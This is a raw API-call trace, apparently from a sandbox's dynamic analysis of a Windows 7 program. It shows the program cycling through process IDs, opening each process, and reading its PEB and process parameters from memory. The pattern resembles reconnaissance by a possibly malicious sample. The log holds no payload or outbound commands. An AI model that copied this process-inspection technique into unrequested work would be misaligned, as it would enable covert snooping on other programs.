[0413.902] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x101ef0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0413.902] malloc (_Size=0x78) returned 0x2c1300
[0413.902] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x102810, lpBuffer=0x2c1300, nSize=0x76, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c1300*, lpNumberOfBytesRead=0x0) returned 1
[0413.902] free (_Block=0x2c1300)
[0413.903] CloseHandle (hObject=0x24c) returned 1
[0413.904] _ui64tow (_Value=0x920, _Buffer="2328", _Radix=10) returned="2336"
[0413.909] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2336") returned 4
[0413.910] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0413.910] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0413.933] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x920) returned 0x24c
[0413.933] GetLastError () returned 0x0
[0413.933] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0413.933] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.933] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0413.933] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x3e2940, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.934] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x3e26fa, lpBuffer=0x12dd100, nSize=0x6e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0413.935] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0413.936] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0413.936] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.936] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x3e1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0413.936] malloc (_Size=0x76) returned 0x2c1300
[0413.936] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x3e2768, lpBuffer=0x2c1300, nSize=0x74, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c1300*, lpNumberOfBytesRead=0x0) returned 1
[0413.936] free (_Block=0x2c1300)
[0413.937] CloseHandle (hObject=0x24c) returned 1
[0413.938] _ui64tow (_Value=0x928, _Buffer="2336", _Radix=10) returned="2344"
[0413.944] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2344") returned 4
[0413.945] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0413.945] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0413.967] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x928) returned 0x24c
[0413.967] GetLastError () returned 0x0
[0413.967] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0413.967] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.968] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0413.968] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x442910, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.968] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4426ee, lpBuffer=0x12dd100, nSize=0x64, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0413.969] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0413.970] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0413.970] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.970] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x441ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0413.971] malloc (_Size=0x6c) returned 0x2c1680
[0413.971] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x442752, lpBuffer=0x2c1680, nSize=0x6a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c1680*, lpNumberOfBytesRead=0x0) returned 1
[0413.971] free (_Block=0x2c1680)
[0413.972] CloseHandle (hObject=0x24c) returned 1
[0413.973] _ui64tow (_Value=0x930, _Buffer="2344", _Radix=10) returned="2352"
[0413.983] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2352") returned 4
[0413.984] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0413.984] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0414.007] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x930) returned 0x24c
[0414.007] GetLastError () returned 0x0
[0414.007] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0414.007] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.007] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0414.007] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x2828c0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.007] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x2826e0, lpBuffer=0x12dd100, nSize=0x50, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0414.008] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0414.009] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0414.010] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.010] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x281ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0414.010] malloc (_Size=0x58) returned 0x2b99b0
[0414.010] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x282730, lpBuffer=0x2b99b0, nSize=0x56, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2b99b0*, lpNumberOfBytesRead=0x0) returned 1
[0414.010] free (_Block=0x2b99b0)
[0414.011] CloseHandle (hObject=0x24c) returned 1
[0414.012] _ui64tow (_Value=0x938, _Buffer="2352", _Radix=10) returned="2360"
[0414.016] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2360") returned 4
[0414.018] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0414.018] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0414.040] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x938) returned 0x24c
[0414.040] GetLastError () returned 0x0
[0414.040] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0414.040] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.040] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0414.040] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x372930, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.041] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x3726fa, lpBuffer=0x12dd100, nSize=0x6c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0414.042] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0414.043] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0414.043] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.043] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x371ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0414.043] malloc (_Size=0x74) returned 0x2c1680
[0414.044] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x372766, lpBuffer=0x2c1680, nSize=0x72, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c1680*, lpNumberOfBytesRead=0x0) returned 1
[0414.044] free (_Block=0x2c1680)
[0414.044] CloseHandle (hObject=0x24c) returned 1
[0414.045] _ui64tow (_Value=0x95c, _Buffer="2360", _Radix=10) returned="2396"
[0414.050] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2396") returned 4
[0414.051] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1243f4, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0414.051] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0414.077] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x95c) returned 0x24c
[0414.077] GetLastError () returned 0x0
[0414.078] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0414.078] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.078] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0414.078] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x5a2950, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.078] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x5a26f6, lpBuffer=0x12dd100, nSize=0x74, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0414.079] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0414.080] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0414.080] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.081] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x5a1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0414.081] malloc (_Size=0x7c) returned 0x2e3a70
[0414.081] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x5a276a, lpBuffer=0x2e3a70, nSize=0x7a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2e3a70*, lpNumberOfBytesRead=0x0) returned 1
[0414.081] free (_Block=0x2e3a70)
[0414.082] CloseHandle (hObject=0x24c) returned 1
[0414.083] _ui64tow (_Value=0x970, _Buffer="2396", _Radix=10) returned="2416"
[0414.087] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2416") returned 4
[0414.088] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0414.088] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0414.109] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x970) returned 0x24c
[0414.109] GetLastError () returned 0x0
[0414.109] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0414.109] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.109] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0414.109] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x1728e0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.110] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x1726e0, lpBuffer=0x12dd100, nSize=0x5a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0414.111] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0414.112] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0414.112] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.112] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x171ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0414.112] malloc (_Size=0x62) returned 0x2c0720
[0414.112] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x17273a, lpBuffer=0x2c0720, nSize=0x60, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c0720*, lpNumberOfBytesRead=0x0) returned 1
[0414.112] free (_Block=0x2c0720)
[0414.113] CloseHandle (hObject=0x24c) returned 1
[0414.116] _ui64tow (_Value=0x96c, _Buffer="2416", _Radix=10) returned="2412"
[0414.120] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2412") returned 4
[0414.121] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0414.122] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0414.145] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x96c) returned 0x24c
[0414.145] GetLastError () returned 0x0
[0414.145] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0414.145] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.145] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0414.146] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x422900, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.146] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4226ee, lpBuffer=0x12dd100, nSize=0x60, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0414.147] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0414.148] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0414.148] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.148] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x421ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0414.149] malloc (_Size=0x68) returned 0x2c0800
[0414.149] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x42274e, lpBuffer=0x2c0800, nSize=0x66, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c0800*, lpNumberOfBytesRead=0x0) returned 1
[0414.149] free (_Block=0x2c0800)
[0414.150] CloseHandle (hObject=0x24c) returned 1
[0414.150] _ui64tow (_Value=0x958, _Buffer="2412", _Radix=10) returned="2392"
[0414.155] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2392") returned 4
[0414.157] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1243f4, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0414.157] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0414.183] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x958) returned 0x24c
[0414.183] GetLastError () returned 0x0
[0414.183] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0414.183] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.183] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0414.184] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4b28f0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.184] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4b26e4, lpBuffer=0x12dd100, nSize=0x5c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0414.185] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0414.186] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0414.186] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.187] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4b1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0414.187] malloc (_Size=0x64) returned 0x2c0720
